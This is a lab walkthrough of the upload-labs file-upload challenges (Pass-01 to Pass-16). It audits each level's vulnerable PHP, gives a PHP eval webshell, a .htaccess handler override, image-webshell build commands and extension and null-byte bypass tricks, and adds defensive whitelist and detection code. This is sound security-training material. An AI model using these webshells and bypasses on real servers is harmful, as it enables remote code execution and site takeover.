upload-labs File Upload Vulnerability Lab Walkthrough [Unfinished!]

Download link for the arbitrary file upload lab upload-labs

Contents

      • Pass-01- Bypassing front-end JS validation
      • Pass-02- Bypassing the MIME type check
      • Pass-03- Bypassing the extension blacklist
      • Pass-04- .htaccess bypass
      • Pass-05- Upper-case extension bypass
      • Pass-06- Trailing-space extension bypass
      • Pass-07- Trailing-dot extension bypass
      • Pass-08- ::$DATA extension bypass
      • Pass-09- Extension splicing (dot-space-dot) bypass
      • Pass-10- Double-written extension bypass
      • Pass-11- GET-type null-byte (%00) truncation
      • Pass-12- POST-type null-byte truncation
      • Pass-13- File header (magic bytes) bypass
      • Pass-14- getimagesize() check bypass
      • Pass-15- exif_imagetype() check bypass
      • Pass-16- Second-rendering bypass
      • To be continued...

Pass-01- Bypassing front-end JS validation

Try uploading a one-line webshell:

<?php @eval($_REQUEST[6868])?>

Code audit:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    // file types allowed for upload
    var allow_ext = ".jpg|.png|.gif";
    // extract the uploaded file's extension
    var ext_name = file.substring(file.lastIndexOf("."));
    // check whether this extension is allowed
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

A whitelist policy: only files with the .jpg, .png or .gif extension are accepted.

Bypass:

Front-end validation is worthless: remove the JS validation hook onsubmit="return checkFile()" from the form and the browser submits the file unchecked.

Pass-02- Bypassing the MIME type check

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name'];
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

Bypass:

File type bypass: the check reads only $_FILES['upload_file']['type'], which is the Content-Type the client itself declares in the multipart request.

Intercept the upload request and change Content-Type to image/jpeg (or image/png, image/gif).

Pass-03- Bypassing the extension blacklist

Code audit:

A blacklist policy is used.

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lower case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Bypass:

The blacklist lists only .asp, .aspx, .php and .jsp, so any extension outside those four passes the check (the upload is shown in the screenshot). Compare the much longer list in the next level.

Pass-04- .htaccess bypass

Code audit:

A blacklist policy is used.

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lower case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Bypass:

Upload a .htaccess file with the following content:

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>

The .htaccess changes how files in the uploads directory are handled: Apache passes any file whose name merely contains the string "jpg" to the PHP interpreter.

Put simply, if a file named 1.jpg contains phpinfo(), Apache will run it through the PHP parser.

Next upload 2.jpg with the following content:

<?php phpinfo();?>

Open the upload path http://192.168.80.139/upload/2.jpg

The PHP code inside the image is executed.

Pass-05- Upper-case extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Compared with the previous level, .htaccess has been added to the blacklist as well.

The case conversion, however, is still missing: the strtolower() call is gone, while in_array() compares case-sensitively.

Bypass:

We can change the extension of the uploaded webshell to upper case:

Rename 1.php to 1.PHP

Upload the file and view the file path.

Visit http://192.168.80.139/upload/202308301506064212.PHP in the address bar.

No error means the upload succeeded.

AntSword (蚁剑) can now be used to connect.

Open the directory manager.

Pass-06- Trailing-space extension bypass

Code audit:

The code is missing trim($file_ext), the call that strips leading and trailing whitespace from the extension (the trim() on the file name is gone as well).

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lower case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

Bypass:

Intercept the upload and append a space to the extension ("1.php "). The blacklist lookup no longer matches, and Windows discards the trailing space when the file is written. The modified request is shown in the screenshot.

Pass-07- Trailing-dot extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lower case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The deldot function call is missing:

$file_name = deldot($file_name); // strip trailing dots from the file name

Bypass:

Append a . after the file extension (1.php.). The extension no longer matches the blacklist, and the file is saved under its original name.

Pass-08- ::$DATA extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lower case
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

This is the line that is missing compared with the earlier levels:

$file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA

On Windows, when a file name is followed by "::$DATA", everything after ::$DATA is treated as a data stream (an NTFS alternate data stream): the extension is not checked and the file name before ::$DATA is kept. The purpose of the trick is simply to skip the extension check.

Bypass:

Append ::$DATA to the uploaded file name so the extension of our file is no longer checked.

Pass-09- Extension splicing (dot-space-dot) bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name); // strip trailing dots from the file name
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); // convert to lower case
        $file_ext = str_ireplace('::$DATA', '', $file_ext); // remove the string ::$DATA
        $file_ext = trim($file_ext); // trim leading and trailing whitespace
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The code first trims leading and trailing whitespace from the file name, then strips trailing dots, then uses strrchr to locate the last dot and determine the extension; but when saving, the file is not renamed and the original file name is used, so 1.php. . (dot + space + dot) gets through.

Bypass:

Upload 1.php, intercept the request with Burp and change the file name to 1.php. .

With . . the checks go like this: first one trailing dot is removed, then the whitespace is trimmed, and the name still ends with a dot, so the extension is not in the blacklist; the file is then saved under the original name.

Pass-10- Double-written extension bypass

Code audit:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

The file name is filtered once by str_ireplace and then appended directly to the path. str_ireplace removes each blacklisted string a single time and is not applied recursively, so the name only has to survive that single pass.

Bypass:

Change the uploaded file's name to 1.pphphp: removing the inner "php" once leaves 1.php.

Pass-11- GET-type null-byte (%00) truncation

How null-byte truncation works:

0x00 is the hexadecimal notation for the character with ASCII code 0; some functions treat this character as the end of a string.

When the system reads a file name and encounters 0x00, it considers the read finished.

Null-byte truncation can therefore bypass the corresponding whitelist check:

1.php[0x00].jpg

Code audit:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

Whitelist filter: only files with the jpg, png or gif extension are allowed.

Note, however, that the save directory is taken from $_GET['save_path'], and content submitted via GET is automatically URL-decoded, so %00 becomes a real 0x00 byte.

Bypass:

Upload 2.jpg; its content is shown in the screenshot.

The image uploads successfully; right-click and copy the image link.

The address contains garbled characters.

Strip everything after 2.php and the PHP probe is reached.

Pass-12- POST-type null-byte truncation

Code audit:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

Same whitelist policy; the difference from the previous level is that save_path now comes from $_POST.

In a POST body, %00 is not decoded automatically, so the byte has to be changed to 00 in the hex view of the intercepted request.

Bypass:

The request edits are shown in the screenshots.

After the change, click Forward to release the request; the upload succeeds!

Copy the image link:

http://127.0.0.1/upload/2.php%EF%BF%BD/7520230830195703.jpg

Remove the trailing part after 2.php:

http://127.0.0.1/upload/2.php
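A whitelist-based upload gate, added here as an example (not upload-labs code, whose handlers are deliberately vulnerable), covering the file-name tricks of Pass-03 to Pass-10, the client-declared Content-Type of Pass-02, and the client-chosen save path and null byte of Pass-11 and Pass-12; UPLOAD_DIR is an assumed location.

```python
import os
import re
import secrets

# Added example, not upload-labs code. UPLOAD_DIR is an assumed location.
ALLOWED = {"jpg": "image/jpeg", "png": "image/png", "gif": "image/gif"}
UPLOAD_DIR = "/var/www/uploads"

def safe_extension(client_name: str):
    """Return the whitelisted lower-case extension, or None to reject."""
    # Pass-11/12: a NUL (or any control byte) in the name means a truncation
    # trick downstream; reject it instead of trying to clean it.
    if any(ord(c) < 0x20 or c == "\x7f" for c in client_name):
        return None
    # Only the final path component counts; the client chooses no directory.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # Pass-08: drop an NTFS alternate data stream suffix such as ::$DATA.
    base = base.split("::", 1)[0]
    # Pass-06/07/09: strip trailing dots and spaces that Windows drops on save.
    base = base.rstrip(". ")
    # The extension is whatever follows the LAST dot; a name that is only an
    # extension (.htaccess, Pass-04) has no stem and is rejected.
    stem, dot, ext = base.rpartition(".")
    if not stem or not dot:
        return None
    # Pass-05/10: lower-case, plain alphanumeric, and in a whitelist (never a
    # blacklist), so case tricks and double-written extensions cannot match.
    ext = ext.lower()
    if not re.fullmatch(r"[a-z0-9]+", ext):
        return None
    return ext if ext in ALLOWED else None

def content_type_matches(ext: str, declared_type: str) -> bool:
    # Pass-02: Content-Type is set by the client, so it may only agree with
    # the extension; it never vouches for the file on its own.
    return ALLOWED.get(ext) == declared_type

def build_save_path(ext: str) -> str:
    # Pass-07/09/10: never reuse the client's name; Pass-11/12: never take the
    # directory from the request. Random name + whitelisted extension only.
    return os.path.join(UPLOAD_DIR, secrets.token_hex(16) + "." + ext)

def accept_upload(client_name: str, declared_type: str):
    """Full gate: the path to save to, or None when the upload is refused."""
    ext = safe_extension(client_name)
    if ext is None or not content_type_matches(ext, declared_type):
        return None
    return build_save_path(ext)
```

The renamed file keeps only the whitelisted extension, so a name like 1.php.jpg is stored as a random-name .jpg and the original stem never reaches the filesystem.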


Pass-13- File header (magic bytes) bypass

Code audit: the level's source is shown in the screenshot; it checks the first bytes of the uploaded file against image signatures.

Bypass:

Contents of shell.php:

<?php @eval($_REQUEST[6868])?>

Making an image webshell:

Windows:
	copy 1.jpg /b + 1.php /a 2.jpg
Linux:
	cat 1.jpg shell.php > shell.jpg

The image uploads successfully.

View the upload path.

The image's upload path is /upload/6720230830201732.jpg

Combine this with the file inclusion vulnerability to execute the image webshell:

http://127.0.0.1/include.php?file=./upload/6720230830201732.jpg

Connect with AntSword.

Pass-14- getimagesize() check bypass

Code audit: the source is shown in the screenshot.

getimagesize() checks the header of the file content (the image signature), not the whole file.

Bypass:

1. An image webshell, as in the previous level

2. Upload the PHP webshell with its content modified (see screenshot)

Upload path of the image: upload/1820230830203805.gif

To trigger the webshell it has to be combined with file inclusion:

http://127.0.0.1/include.php?file=./upload/1820230830203805.gif

Connect with AntSword.

Pass-15- exif_imagetype() check bypass

Code audit: the source is shown in the screenshot.

exif_imagetype — reads the first bytes of a file and checks their signature to determine whether it is an image and of which type.

Bypass:

Generate an image webshell to pass the function check, then use the file inclusion vulnerability to connect to the webshell.
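Why the header checks of Pass-13 to Pass-15 are not enough, as an added example (not upload-labs code): a signature check of the kind getimagesize()/exif_imagetype() perform, next to a content scan that flags the image+PHP concatenation the Pass-13 recipe produces. The sample bytes are constructed here, not taken from the lab.

```python
import re

# Added example, not upload-labs code: a signature check like the one
# getimagesize()/exif_imagetype() rely on, plus a whole-file content scan.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# PHP open tags plus the eval() call used by this lab's one-line shell.
# (Add a bare "<?" pattern only if short_open_tag is enabled on the host;
# otherwise it produces false positives on binary image data.)
PHP_MARKERS = re.compile(rb"<\?php\b|<\?=|\beval\s*\(", re.IGNORECASE)

def image_type_by_header(data: bytes):
    """Decide the type from the first bytes only, as the header checks do."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None

def contains_php(data: bytes) -> bool:
    """True if PHP code appears anywhere in the bytes, not just at the start."""
    return PHP_MARKERS.search(data) is not None

def classify(data: bytes) -> str:
    """Defender's verdict: the header check AND the content scan must pass."""
    kind = image_type_by_header(data)
    if kind is None:
        return "reject: not an image header"
    if contains_php(data):
        return "reject: %s header but PHP code embedded" % kind
    return "accept: %s" % kind

# Constructed samples. FAKE_JPEG has the shape the Pass-13 recipe
# (cat 1.jpg shell.php > shell.jpg) produces: image bytes, then the shell.
FAKE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 8 + b"<?php @eval($_REQUEST[6868])?>"
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16
```

The header check alone accepts FAKE_JPEG exactly as the lab's checks do; the content scan is a heuristic, so re-encoding the image server-side (the second-rendering step Pass-16 introduces) and never include()-ing files from the upload directory are the controls that close the class of bug.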

Pass-16- Second-rendering bypass

The PHP code in this level accepts image uploads but re-renders (re-encodes) the image, so we have to get past the re-rendering step, i.e. put the PHP webshell code into a part of the image that re-rendering leaves unchanged.

As long as move_uploaded_file succeeds, the upload goes through!!!

Bypass:
Detailed explanation (link)

To be continued...
